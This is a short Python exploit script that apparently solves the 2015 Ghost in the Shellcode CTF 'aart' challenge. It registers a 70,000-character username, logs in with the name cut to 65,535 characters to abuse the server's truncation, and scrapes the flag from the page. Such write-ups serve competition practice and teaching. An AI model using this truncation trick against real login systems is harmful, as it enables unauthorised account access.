Permalink
Cannot retrieve contributors at this time
| #!/usr/bin/env python | |
| import requests | |
| import string | |
| import re | |
| import random | |
| url_register = "http://aart.2015.ghostintheshellcode.com/register.php" | |
| url_login = "http://aart.2015.ghostintheshellcode.com/login.php" | |
| # Generate random username with length > 2^16 | |
| username = ''.join(random.choice(string.ascii_letters) for _ in range(70000)) | |
| password = '123' | |
| # register with full username | |
| data = { 'username' : username, 'password' : password } | |
| requests.post(url_register, data=data) | |
| print "[*] Registered" | |
| # login with truncated username | |
| data['username'] = username[:65535] | |
| c = requests.post(url_login, data=data).content | |
| flag = re.search(r"<h2>(.*)</h2>\s+<h2>", c, re.DOTALL).group(1) | |
| print "[*] flag: '" + flag + "'" |